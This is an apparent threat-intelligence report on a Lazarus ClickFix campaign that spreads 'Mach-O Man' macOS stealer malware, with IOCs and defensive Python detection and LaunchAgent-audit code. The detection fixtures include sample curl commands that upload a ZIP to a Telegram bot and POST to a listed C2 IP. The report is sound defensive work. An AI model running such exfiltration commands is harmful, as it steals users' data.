
New Lazarus APT Campaign: “Mach-O Man” macOS Malware Kit Hits Businesses

Lazarus Group is conducting a new ClickFix campaign targeting macOS users in high-value sectors via Telegram. The attackers trick victims into executing a terminal command that deploys 'Mach-O Man,' a multi-stage Go-based malware kit designed to steal credentials, browser data, and macOS Keychain secrets, exfiltrating the data via Telegram.

Sens: Immediate | Conf: high | Analyzed: 2026-04-21

Authors: Mauro Eldritch, BCA LTD, Quetzal Team

Actors: Lazarus Group | Mach-O Man | ClickFix

Source: ANY.RUN

IOCs · 5

Key Takeaways

  • Lazarus Group is distributing a new macOS malware kit called 'Mach-O Man' via a ClickFix social engineering campaign on Telegram.
  • The attack relies on users manually executing a malicious terminal command, bypassing traditional security controls.
  • The malware consists of multiple Go-based Mach-O binaries: a stager, a profiler, a persistence module, and a stealer.
  • Persistence is achieved by creating a LaunchAgent that disguises the malware as a OneDrive service.
  • Stolen data, including browser sessions, extensions, and macOS Keychain entries, is exfiltrated via a Telegram bot.

Affected Systems

  • macOS

Attack Chain

The attack begins with a social engineering lure on Telegram, directing the victim to a fake meeting page that prompts them to execute a terminal command. This command downloads and runs the 'teamsSDK.bin' stager, which drops a fake meeting application and downloads the 'D1YrHRTg.bin' profiler to fingerprint the system. Next, 'minst2.bin' establishes persistence by creating a LaunchAgent disguised as OneDrive. Finally, the 'macrasv2' stealer is executed to collect browser data, extensions, and macOS Keychain entries, archiving them into a ZIP file and exfiltrating the data via a Telegram bot before running a self-deletion script.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide specific detection rules but offers detailed behavioral indicators, file hashes, and network IOCs suitable for custom rule creation.

Detection Engineering Assessment

  • EDR Visibility: Medium — The attack relies on native macOS binaries and user-executed commands, which can blend in with legitimate administrative activity, though the creation of suspicious LaunchAgents and unusual curl commands should be visible.
  • Network Visibility: Medium — Exfiltration occurs over the Telegram API (HTTPS), which is encrypted and often allowed in corporate environments, but communication with raw IP addresses on ports 8888 and 9999 is highly anomalous.
  • Detection Difficulty: Moderate — The use of social engineering to trick users into executing the initial payload bypasses many automated defenses, but the subsequent behavior (LaunchAgent creation, sysctl fingerprinting, Telegram API exfiltration) provides solid detection opportunities.

Required Log Sources

  • macOS Unified Log
  • Endpoint Process Execution Logs
  • Network Traffic Logs
  • File Creation Logs

Hunting Hypotheses

  • Hypothesis: Look for unusual sysctl commands querying CPU brand strings, often used for sandbox evasion. | Telemetry: Process Execution Logs | ATT&CK Stage: Discovery | FP Risk: Low
  • Hypothesis: Identify the creation of LaunchAgents in ~/Library/LaunchAgents/ referencing suspicious binaries in hidden directories like ~/.local/bin/. | Telemetry: File Creation Logs | ATT&CK Stage: Persistence | FP Risk: Low
  • Hypothesis: Monitor for curl commands making POST requests to the Telegram API, especially from non-browser processes. | Telemetry: Process Execution Logs, Network Logs | ATT&CK Stage: Exfiltration | FP Risk: Medium
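The three hypotheses above, expressed as triage logic over process-execution events. This is an added example, not code from the report or from ANY.RUN; the event format (parent image, image, command line) and the sample events are constructed, and only the C2 IP in event 3 comes from the report's IOCs.

```python
import re
import shlex

# Constructed sample process-execution events (not taken from the report):
# "parent_image|image|command_line". Event 3 reuses the report's C2 IP.
SAMPLE_EVENTS = [
    "/bin/bash|/usr/sbin/sysctl|sysctl -n machdep.cpu.brand_string",
    "/bin/sh|/usr/bin/curl|curl -s -X POST https://api.telegram.org/botTOKEN/sendDocument -F document=@/tmp/out.zip",
    "/Applications/Safari.app/Contents/MacOS/Safari|/usr/bin/curl|curl -s https://example.com/",
    "/bin/sh|/usr/bin/curl|curl -s -X POST http://172.86.113.102:8888/beacon",
    "/bin/zsh|/usr/sbin/sysctl|sysctl -n hw.memsize",
]

BROWSERS = ("Safari", "Google Chrome", "firefox", "Microsoft Edge", "Brave Browser")
TELEGRAM_API = re.compile(r"https?://api\.telegram\.org/bot", re.I)
RAW_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::(\d+))?(?:/|$)")

def curl_is_post(argv):
    """True for 'curl -X POST ...' and for the fused '-XPOST' spelling."""
    for i, a in enumerate(argv):
        if a == "-X" and i + 1 < len(argv) and argv[i + 1].upper() == "POST":
            return True
        if a.upper() == "-XPOST":
            return True
    return False

def triage(event):
    """Return (ATT&CK stage, reason) pairs matching the hunting hypotheses."""
    parent, image, cmd = event.split("|", 2)
    argv = shlex.split(cmd)
    hits = []
    # Hypothesis 1: CPU brand string lookup used for VM/sandbox fingerprinting.
    if image.endswith("/sysctl") and "machdep.cpu.brand_string" in argv:
        hits.append(("Discovery", "sysctl CPU brand string query (sandbox fingerprinting)"))
    if image.endswith("/curl"):
        from_browser = any(b in parent for b in BROWSERS)
        # Hypothesis 3: POST to the Telegram bot API from a non-browser parent.
        if curl_is_post(argv) and TELEGRAM_API.search(cmd) and not from_browser:
            hits.append(("Exfiltration", "curl POST to Telegram bot API from non-browser parent"))
        # Key behavioral indicator: curl to a raw IP, ports 8888/9999 being most anomalous.
        m = RAW_IP_URL.search(cmd)
        if m:
            port = m.group(1) or "80/443"
            hits.append(("Command and Control", f"curl to raw IP address on port {port}"))
    return hits

def hunt(events):
    """Map each matching event to its findings; events with no hit are dropped."""
    return {e: triage(e) for e in events if triage(e)}
```

The LaunchAgent hypothesis (file creation telemetry) is covered separately by the plist audit under Immediate Mitigation, since it needs file content rather than a command line.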

Control Gaps

  • User execution of arbitrary terminal commands
  • Lack of strict egress filtering for Telegram API
  • Execution of ad-hoc signed binaries

Key Behavioral Indicators

  • Creation of com.onedrive.launcher.plist
  • Execution of binaries from $TMPDIR
  • Repeated curl POST requests to raw IPs or Telegram API
  • Ad-hoc signed applications prompting for credentials

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Block known C2 IP addresses and domains.
  • Search endpoint telemetry for the provided file hashes and suspicious file paths (e.g., ~/.local/bin/OneDrive).
  • Revoke and rotate any credentials or session tokens for users suspected of compromise.
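One way to carry out the path search above and to check for the com.onedrive.launcher.plist indicator: audit every LaunchAgent for a vendor-sounding label whose executable sits in a hidden or temporary directory. Added example, not code from the report or from ANY.RUN; the two plists, the username and the benign label are constructed, and the trusted-root list is an assumption to tune per fleet.

```python
import glob
import os
import plistlib

# Constructed LaunchAgent plists (not taken from the report). The first mirrors the
# paths the report lists (label com.onedrive.launcher, binary under ~/.local/bin).
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.onedrive.launcher</string>
  <key>ProgramArguments</key><array><string>/Users/alice/.local/bin/OneDrive</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.microsoft.OneDriveUpdater</string>
  <key>ProgramArguments</key><array><string>/Applications/OneDrive.app/Contents/MacOS/OneDrive</string></array>
</dict></plist>"""

TRUSTED_ROOTS = ("/Applications/", "/System/", "/usr/", "/Library/", "/opt/")  # assumption
TEMP_ROOTS = ("/tmp/", "/private/tmp/", "/private/var/folders/", "/var/folders/")

def audit_launch_agent(data):
    """Return the reasons a LaunchAgent matches the report's persistence pattern."""
    agent = plistlib.loads(data)
    args = agent.get("ProgramArguments") or []
    exe = agent.get("Program") or (args[0] if args else "")  # Program wins if both set
    label = str(agent.get("Label", "")).lower()
    findings = []
    if any(part.startswith(".") for part in exe.split("/") if part):
        findings.append("executable lives under a hidden directory")
    if exe.startswith(TEMP_ROOTS):
        findings.append("executable runs from a temporary directory")
    if "onedrive" in label and not exe.startswith(TRUSTED_ROOTS):
        findings.append("label imitates OneDrive but binary is outside standard install roots")
    if findings and agent.get("RunAtLoad") and agent.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive keeps the binary resident across logins")
    return findings

def scan_launch_agents(directory):
    """Audit every .plist in a LaunchAgents directory; returns {path: findings} for hits."""
    hits = {}
    for path in glob.glob(os.path.join(directory, "*.plist")):
        with open(path, "rb") as f:
            findings = audit_launch_agent(f.read())
        if findings:
            hits[path] = findings
    return hits
```

Run `scan_launch_agents(os.path.expanduser("~/Library/LaunchAgents"))` per user; binary plists are handled by plistlib as well as XML ones.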

Infrastructure Hardening

  • Implement strict egress filtering to block unauthorized communication on non-standard ports (e.g., 8888, 9999).
  • Restrict the execution of ad-hoc signed binaries on macOS endpoints.

User Protection

  • Deploy EDR solutions configured to monitor and block suspicious LaunchAgent creations.
  • Restrict access to the macOS Terminal for non-developer users where feasible.

Security Awareness

  • Educate employees on the risks of 'ClickFix' social engineering tactics, specifically warning against copying and pasting terminal commands from meeting invites or error pages.

MITRE ATT&CK Mapping

  • T1204 - User Execution
  • T1543.001 - Create or Modify System Process: Launch Agent
  • T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  • T1222 - File and Directory Permissions Modification
  • T1497 - Virtualization/Sandbox Evasion
  • T1555 - Credentials from Password Stores
  • T1552 - Unsecured Credentials
  • T1082 - System Information Discovery
  • T1057 - Process Discovery
  • T1124 - System Time Discovery
  • T1083 - File and Directory Discovery
  • T1005 - Data from Local System
  • T1560 - Archive Collected Data
  • T1567 - Exfiltration Over Web Service

Additional IOCs

  • IPs:
    • 172[.]86[.]113[.]102 - Payload hosting and C2 server
    • 144[.]172[.]114[.]220 - C2 and exfiltration server
  • Domains:
    • update-teams[.]live - Fake Teams update domain
    • livemicrosft[.]com - Typosquatted Microsoft domain
  • URLs:
    • hxxp://172[.]86[.]113[.]102/Onedrive - Payload URL for fake OneDrive binary
    • hxxps://update-teams[.]live/teams - Fake Teams update URL
    • hxxp://172[.]86[.]113[.]102/localencode - Payload URL for localencode binary
    • livemicrosft.com/meet/89035563931?p=9jXK14VFM8fObdKxfkake8tD7rPhzs.1 - Fake meeting invite URL
  • File Hashes:
    • eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5 (SHA256) - com.onedrive.launcher.plist / com.onedrive.launcher.tmp
    • 0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90 (SHA256) - D1yCPUyk.bin / D1YrHRTg.bin (Profiler)
    • a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614 (SHA256) - localencode / OneDrive
    • cc31b3dc8aeed0af9dd24b7e739f183527d55d5b5ecd3d93ba45dd4aaa8ba260 (SHA256) - MauroDPRKSamples.zip
    • 4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b (SHA256) - minst2.bin (Persistence mechanism)
    • 89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938 (SHA256) - SystemApp.zip
    • dfee6ea9cafc674b93a8460b9e6beea7f0eb0c28e28d1190309347fd1514dbb6 (SHA256) - TeamsApp.zip
    • 24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9 (SHA256) - ZoomApp.zip
  • File Paths:
    • /Users/$USER/.local/bin/OneDrive - Dropped malicious binary masquerading as OneDrive
    • ~/Library/.initialized - Suspicious hidden file created by malware
    • ~/Library/LaunchAgents/com.onedrive.launcher.plist - Persistence LaunchAgent
    • ~/Library/LaunchAgents/com.onedrive.launcher.tmp - Temporary file during LaunchAgent creation
    • $TMPDIR/OneDrive - Temporary staging for OneDrive binary
    • $TMPDIR/geniex_client_sleep_state - Suspicious temporary file
    • bin.config - Malware configuration file
  • Command Lines:
    • Purpose: Host fingerprinting for VM/sandbox evasion | Tools: sysctl, bash | Stage: Discovery | sysctl -n machdep.cpu.brand_string
    • Purpose: Data exfiltration to C2 | Tools: curl | Stage: Exfiltration | curl -s -X POST
    • Purpose: Self-deletion routine | Tools: rm, sh | Stage: Defense Evasion | rm -f
  • Other:
    • a73ce18952b40fd621789e43c56b2af08d1497ce3560b2481fa973d8265ce491 - RC4 Key
    • 5476bbf8ddb2fb056295f09ebe05e20a7d1cf29ea279cd4613c87544013e080fef35c97b3511ef9c0f12e505a1d805628ba10483dc9290508f94d153ee94d5c4 - RC4 Key
    • GoBuildID: XSnX8a5Y1OweX0Ob6lfO/ZYlrxu-H_BNvt5ptXb3c/8HR_X2LwoFzXXN4Fti_K/xaM13na_g6snvgcy0x9t - Go Build ID artifact